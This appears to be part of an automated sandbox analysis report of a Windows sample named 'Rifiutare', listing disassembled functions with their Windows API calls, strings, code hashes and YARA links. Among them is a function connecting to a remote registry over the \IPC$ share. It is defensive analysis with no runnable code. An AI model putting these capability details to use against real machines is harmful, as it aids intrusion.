API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 2e2c2a2331548cee2b1e47a173b01fcb5872c99b2f45b3d12316e864239f3a5f
Instruction ID: faf5b2f9703b4e8fa9f6085ea3349b3a4e8a40a5c950c67db785195129b5c68b
Opcode Fuzzy Hash: 2e2c2a2331548cee2b1e47a173b01fcb5872c99b2f45b3d12316e864239f3a5f
Instruction Fuzzy Hash: 9561AE30522700DFDB26DF15DD89B3977B1FB51312F188429E89A9B6A0C770AE81DF90

Function 00C32078 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00C32184: GetWindowLongW.USER32(?,000000EB), ref: 00C32192

GetSysColor.USER32(0000000F), ref: 00C320A2

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: ae4a98940de02a20619b0630f8bf7bef7af4a72280e93c3eb12ffc538fa2fda6
Instruction ID: da3e2b1a1ec92706582683db876df44f274056e73f1ce8bf00f1237b9e77a1bc
Opcode Fuzzy Hash: ae4a98940de02a20619b0630f8bf7bef7af4a72280e93c3eb12ffc538fa2fda6
Instruction Fuzzy Hash: B641A031250640AFDF245B38DD48BBD7766AB46731F188215FAB78B2E1C7319E42EB10

Function 00C90EFD Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00C3B0DB: _wcslen.LIBCMT ref: 00C3B0EE

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C90FC1
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C90FDD
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C90FF9
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C91023
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00C9104B
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C91056
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C9105B

Strings

SOFTWARE\Classes\, xrefs: 00C90F2D
\CLSID, xrefs: 00C90F43
\IPC$, xrefs: 00C90FA3

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: fea9dc4ba99034d21563f56a57b3e22893c5f5ed64a44c71354aa6b8124d7eb0
Instruction ID: aa19c82786d10e8607507be67eab6a2297a95c0e0e3881cd78c922040c53da7f
Opcode Fuzzy Hash: fea9dc4ba99034d21563f56a57b3e22893c5f5ed64a44c71354aa6b8124d7eb0
Instruction Fuzzy Hash: 7841FA72C2022DABCF25EBA4DC95DEEB7B8FF04750F044129E912A31A1DB709E44DB50

Function 00CC4672 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00CC4717
CreateCompatibleDC.GDI32(00000000), ref: 00CC471E
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00CC4731
SelectObject.GDI32(00000000,00000000), ref: 00CC4739
GetPixel.GDI32(00000000,00000000,00000000), ref: 00CC4744
DeleteDC.GDI32(00000000), ref: 00CC474E
GetWindowLongW.USER32(?,000000EC), ref: 00CC4758
SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00CC476E
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00CC477A

Strings

static, xrefs: 00CC46AF

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 2423a584a2319d228519150bb058dd385970b763321dfa10585d1aa19e19fad8
Instruction ID: 9a3909508a14efa0fa59893a3ffa3d5222f1939df10784ea34b9151f085d95f4
Opcode Fuzzy Hash: 2423a584a2319d228519150bb058dd385970b763321dfa10585d1aa19e19fad8
Instruction Fuzzy Hash: 14316F31100219ABDF129F64DC49FDE3BA9FF0A325F114229FA26A61A0C775D961DBA0

Function 00CB4403 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00CB442F
CoInitialize.OLE32(00000000), ref: 00CB445D
CoUninitialize.OLE32 ref: 00CB4467
_wcslen.LIBCMT ref: 00CB4500
GetRunningObjectTable.OLE32(00000000,?), ref: 00CB4584
SetErrorMode.KERNEL32(00000001,00000029), ref: 00CB46A8
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00CB46E1
CoGetObject.OLE32(?,00000000,00CD0B5C,?), ref: 00CB4700
SetErrorMode.KERNEL32(00000000), ref: 00CB4713
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00CB4797
VariantClear.OLEAUT32(?), ref: 00CB47AB

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 9a9b4a4af52b7e697ce21f5ddfd407c7dcdbf070eeaced082485102c8273f68b
Instruction ID: e86508c010e39469f9a0d5c556c473b0dd83a9cc1ae1603bca173ad0ddb2ae34
Opcode Fuzzy Hash: 9a9b4a4af52b7e697ce21f5ddfd407c7dcdbf070eeaced082485102c8273f68b
Instruction Fuzzy Hash: C1C14571608301AFC704DF68C884A6AB7E9FF89748F10496DF99A9B252DB30ED45CB52

Function 00CA8297 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00CA82F4
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00CA8390
SHGetDesktopFolder.SHELL32(?), ref: 00CA83A4
CoCreateInstance.OLE32(00CD0CCC,00000000,00000001,00CF7E4C,?), ref: 00CA83F0
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00CA8475
CoTaskMemFree.OLE32(?,?), ref: 00CA84CD
SHBrowseForFolderW.SHELL32(?), ref: 00CA8558
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00CA857B
CoTaskMemFree.OLE32(00000000), ref: 00CA8582
CoTaskMemFree.OLE32(00000000), ref: 00CA85D7
CoUninitialize.OLE32 ref: 00CA85DD

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: d3c8aaa6154e6dc1e677f5534ac3549b8ee899479ff5d5fd9a9e8cc33cdcefd7
Instruction ID: 6b938ae8dabf571882b8f297f0d80548ec5ac701414029c06e91456054a8af6b
Opcode Fuzzy Hash: d3c8aaa6154e6dc1e677f5534ac3549b8ee899479ff5d5fd9a9e8cc33cdcefd7
Instruction Fuzzy Hash: 73C10C75A00205AFDB14DF64C888D9EBBF5FF49318B1484A9F916DB261DB30EE45CB90

Function 00C902A7 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C902CE
SafeArrayAllocData.OLEAUT32(?), ref: 00C90327
VariantInit.OLEAUT32(?), ref: 00C90339
SafeArrayAccessData.OLEAUT32(?,?), ref: 00C90359
VariantCopy.OLEAUT32(?,?), ref: 00C903AC
SafeArrayUnaccessData.OLEAUT32(?), ref: 00C903C0
VariantClear.OLEAUT32(?), ref: 00C903D5
SafeArrayDestroyData.OLEAUT32(?), ref: 00C903E2
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C903EB
VariantClear.OLEAUT32(?), ref: 00C903FD
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C90408

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: c3edaf44c3efb49a56f435a826e0070760466cea805627a96f1c42b5b202e8da
Instruction ID: 076553faee9ad6373ab041439a050475511aaf2580456917af3f63a25b27a397
Opcode Fuzzy Hash: c3edaf44c3efb49a56f435a826e0070760466cea805627a96f1c42b5b202e8da
Instruction Fuzzy Hash: A9414075A00219DFCF04DF64D848EADBBB9FF48344F108069E956A7261DB34EA45CFA0

Function 00CCA58E Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 260windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C323E1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C323F2

GetSystemMetrics.USER32(0000000F), ref: 00CCA5CF
GetSystemMetrics.USER32(0000000F), ref: 00CCA5EF
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00CCA82C
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00CCA84A
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00CCA86B
ShowWindow.USER32(00000003,00000000), ref: 00CCA88A
InvalidateRect.USER32(?,00000000,00000001), ref: 00CCA8AF
DefDlgProcW.USER32(?,00000005,?,?), ref: 00CCA8D2

Strings

, xrefs: 00CCA7E0

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-3916222277
Opcode ID: b09009158033b21e0a0a657c3786caf78e0140c9a4b2a16aecb624bd280adbeb
Instruction ID: f2c52786829ee71a1dcf85f9b14c6bb49ac8dff08324842cf0af170899b9b606
Opcode Fuzzy Hash: b09009158033b21e0a0a657c3786caf78e0140c9a4b2a16aecb624bd280adbeb
Instruction Fuzzy Hash: 48B19B35A00219DFDF14CF28C989BAE7BF2FF44705F188069ED599B295D730AA41CB62

Function 00CB0DA1 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00CB0E02
inet_addr.WSOCK32(?), ref: 00CB0E62
gethostbyname.WSOCK32(?), ref: 00CB0E6E
IcmpCreateFile.IPHLPAPI ref: 00CB0E7C
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00CB0F0C
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00CB0F2B
IcmpCloseHandle.IPHLPAPI(?), ref: 00CB0FFF
WSACleanup.WSOCK32 ref: 00CB1005

Strings

Ping, xrefs: 00CB0EBC

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 2b5e47e6f1b5d7e85c075ad9441e26d3f2d6e0bd7b94b9662cd2e5702ac36b96
Instruction ID: 6fa4b43df19f28eae689a9c91af6825bce770b791caf81ecdf37d9d79c43e36e
Opcode Fuzzy Hash: 2b5e47e6f1b5d7e85c075ad9441e26d3f2d6e0bd7b94b9662cd2e5702ac36b96
Instruction Fuzzy Hash: 8C9190316082419FD720DF55C489F6BBBE0BF48358F2485A9F46A8B7A2C730ED45CB92

Function 00CB9445 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00CB9465

Part of subcall function 00C99670: _wcslen.LIBCMT ref: 00C99693

_wcslen.LIBCMT ref: 00CB94C0
_wcslen.LIBCMT ref: 00CB950E
_wcslen.LIBCMT ref: 00CB954E
_wcslen.LIBCMT ref: 00CB95E0

Strings

cdecl, xrefs: 00CB94BA, 00CB94BF
stdcall, xrefs: 00CB9548, 00CB954D
winapi, xrefs: 00CB9508, 00CB950D
none, xrefs: 00CB95D7, 00CB95DC

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: f33e6331fc55d7e3e17d2e330ae784300ee995bb0af97d5f1e2726ddd32242ed
Instruction ID: b282c37adf9c31583c725d3994556b34a7231aef5652b0fb859aa1320707be4d
Opcode Fuzzy Hash: f33e6331fc55d7e3e17d2e330ae784300ee995bb0af97d5f1e2726ddd32242ed
Instruction Fuzzy Hash: DD51B371A041169BCF25DF68C9909FDB3A5EF24324F204329FA2AD7284DB31DE45D790

Function 00CA8996 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00CA8A58
SystemTimeToFileTime.KERNEL32(?,?), ref: 00CA8A68
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CA8A74
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CA8B11
SetCurrentDirectoryW.KERNEL32(?), ref: 00CA8B25
SetCurrentDirectoryW.KERNEL32(?), ref: 00CA8B57
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00CA8B8D
SetCurrentDirectoryW.KERNEL32(?), ref: 00CA8B96

Strings

*.*, xrefs: 00CA8B9C

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 204639dcb9c0d29b5e3bb47399dcd1c4a1f27e051430d5c83770230345b79d41
Instruction ID: ba0b06a4f5b1c5410d1f4a36182f255d2ddd41cbfbd8a62db7d3dea14d7ca466
Opcode Fuzzy Hash: 204639dcb9c0d29b5e3bb47399dcd1c4a1f27e051430d5c83770230345b79d41
Instruction Fuzzy Hash: DF618DB25043059FCB10EF60D884A9EB3E8FF8A314F04491EF99997251DB31EE49CB92

Function 00CC4320 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00CC4353
SetMenu.USER32(?,00000000), ref: 00CC4362
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CC43EA
IsMenu.USER32(?), ref: 00CC43FE
CreatePopupMenu.USER32 ref: 00CC4408
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00CC4435
DrawMenuBar.USER32 ref: 00CC443D

Strings

0, xrefs: 00CC432E
F, xrefs: 00CC4428

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 5fdca985334b880ee974e8fb6ed552db021dbfb5ac73068ed6d647cf5b656e08
Instruction ID: 8c7c759d38a9c9c91c076de1ccc27580b826411b55f36ffd3b46e6f7f9da35c9
Opcode Fuzzy Hash: 5fdca985334b880ee974e8fb6ed552db021dbfb5ac73068ed6d647cf5b656e08
Instruction Fuzzy Hash: 424113B5A01209EFDB18CF64E894FAABBB5FF49314F14402CE956A7360C730AA10CF61

Function 00C926DF Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C3C110: _wcslen.LIBCMT ref: 00C3C11A

Part of subcall function 00C944BB: GetClassNameW.USER32(?,?,000000FF), ref: 00C944DE

SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00C92764
GetDlgCtrlID.USER32 ref: 00C9276F
GetParent.USER32 ref: 00C9278B
SendMessageW.USER32(00000000,?,00000111,?), ref: 00C9278E
GetDlgCtrlID.USER32(?), ref: 00C92797
GetParent.USER32(?), ref: 00C927AB
SendMessageW.USER32(00000000,?,00000111,?), ref: 00C927AE

Strings

ListBox, xrefs: 00C92721
ComboBox, xrefs: 00C926EC

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: fd772e5fd39c652ff3f77c058c3513e92ac270e8599ff884d8eac6d23e502f25
Instruction ID: 3ca483847332e5d2103461f0890ee8ff33d4190f25f008a6db51b94e69048ab0
Opcode Fuzzy Hash: fd772e5fd39c652ff3f77c058c3513e92ac270e8599ff884d8eac6d23e502f25
Instruction Fuzzy Hash: AD21A774D00114BBCF05EFA0CC89FEEBBB8EF05350F104565F9A1A7292CA795959EB60

Function 00C927C0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C3C110: _wcslen.LIBCMT ref: 00C3C11A

Part of subcall function 00C944BB: GetClassNameW.USER32(?,?,000000FF), ref: 00C944DE

SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00C92843
GetDlgCtrlID.USER32 ref: 00C9284E
GetParent.USER32 ref: 00C9286A
SendMessageW.USER32(00000000,?,00000111,?), ref: 00C9286D
GetDlgCtrlID.USER32(?), ref: 00C92876
GetParent.USER32(?), ref: 00C9288A
SendMessageW.USER32(00000000,?,00000111,?), ref: 00C9288D

Strings

ListBox, xrefs: 00C92802
ComboBox, xrefs: 00C927CD

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: e63ca265f7af232232444d1c0f6af9192ce2d26b647d58034e1fc14fa4f275a6
Instruction ID: 9fd6358e78c7501f4f6c2289c2052a6e6f0e90df9db1548b407075b6de735a1a
Opcode Fuzzy Hash: e63ca265f7af232232444d1c0f6af9192ce2d26b647d58034e1fc14fa4f275a6
Instruction Fuzzy Hash: 0E21A4B5D00118BBCF11ABA0CC89FEEBBB8EF05300F004465F991A7296DA795955EB64

Function 00CC40FD Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00CC4177
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00CC417A
GetWindowLongW.USER32(?,000000F0), ref: 00CC41A1
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CC41C4
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00CC423C
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00CC4286
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00CC42A1
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00CC42BC
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00CC42D0
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00CC42ED

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: b8965935899c1519debf45324e172e032a9b146a4fe204be3539f920c3036866
Instruction ID: e992836b9bc2d4850f0c7424f878b1c80fddd18210229e2ace52cc5660b90777
Opcode Fuzzy Hash: b8965935899c1519debf45324e172e032a9b146a4fe204be3539f920c3036866
Instruction Fuzzy Hash: A4617875900208AFDB24DFA8CC81FEE77B8EF09310F10416AFA15E72A1C770AA45DB60

Function 00C630A0 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00C630B4

Part of subcall function 00C62DE8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C6DBF1,?,00000000,?,00000000,?,00C6DC18,?,00000007,?,?,00C6E016,?), ref: 00C62DFE
